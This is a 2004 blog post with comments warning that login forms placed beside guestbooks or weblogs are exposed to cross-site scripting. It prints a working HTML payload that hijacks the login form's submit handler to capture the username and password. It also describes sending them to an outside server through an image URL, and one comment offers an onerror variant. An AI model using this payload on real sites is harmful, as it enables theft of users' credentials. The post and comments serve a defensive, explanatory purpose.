Remove login pages to a seperate page!

I looked arround in the web to find websites with security lecks. After months there is no change to the webmasters, they still offer login textboxes side-by-side to guestbooks or weblogs. Some weeks ago I posted a sample on how to allow javascript execution on websites with a mouseover. But this was not very good...

Today, I will show code that allows you to get username and password from pages that have the login form on the same page as the guestbook. The following code can be added to a guestbook or a weblog if the accept html code, the do not have to allow <SCRIPT> tags:

<img src="/trans.gif" onreadystatechange="document.forms[0].onsubmit=new Function('alert(\'Website hacked: \'+document.forms[0].username.value+\'|\'+document.forms[0].password.value);');" width=1 height=1>

Now, if the page will be shown the onreadystatechange event will be fired (Note: the trans.gif must be available on this website, can be replaced by any other image!). We add a new function to the event handler submit. If you click on submit (will be login) a message box will appear showing your credentials. It is very easy to load a second image from your server with the credentials as additional arguments like http://yourserver.com/image.gif?username=xx&password=yy, so you have everything you want.

I have created this small script to show you how easy it still is to get user credentials.

To be secure put the login form to a seperate page!!!

If you need assistence to prevent such security lecks go to http://www.schwarz-interactive.de to get help.

Published Tuesday, April 06, 2004 11:42 PM by Michael Schwarz

Comments

# re: Remove login pages to a seperate page!

Tuesday, April 06, 2004 5:47 PM by Phil Scott
Of course, you could encode the messages so that it isn't interpretted as html, which you should be doing anyways on a guestbook or something similiar (ie this comments box)

# re: Remove login pages to a seperate page!

Tuesday, April 06, 2004 5:56 PM by Jerry Pisk
But a lot of forums do not encode, and allow [some] html tags to be included.

Btw if you want to be safe and use an image that doesn't exist just use the onerror event handler.

# re: Remove login pages to a seperate page!

Tuesday, April 06, 2004 6:04 PM by Phil Scott
If a forum doesn't know enough to encode, i doubt if they've ever even began to think about cross site scripting attacks :)

# re: Remove login pages to a seperate page!

Tuesday, April 06, 2004 6:11 PM by David Cumps
Right, you'd be surprised to see the number of people out there who make these mistakes over and over, like they have been living under a rock for years.

Just take a look at http://www.claroline.net, it seems good, it comes from a university and is used world-wide, yet it's full of holes, one of them being allowing HTML about everywhere...

# re: Remove login pages to a seperate page!

Wednesday, April 07, 2004 12:56 AM by Michael Schwarz
@Phil Scott: Yes, you can encode your messages, but sometimes you want to allow html fragments. I would say if you filter the message that there is no SCRIPT tag and all events are destroyed it can be safe.

# re: Remove login pages to a seperate page!

Wednesday, April 07, 2004 4:04 PM by David Cumps
It is not safe when you filter out harmfull constructs.
It is safe when you allow safe constructs.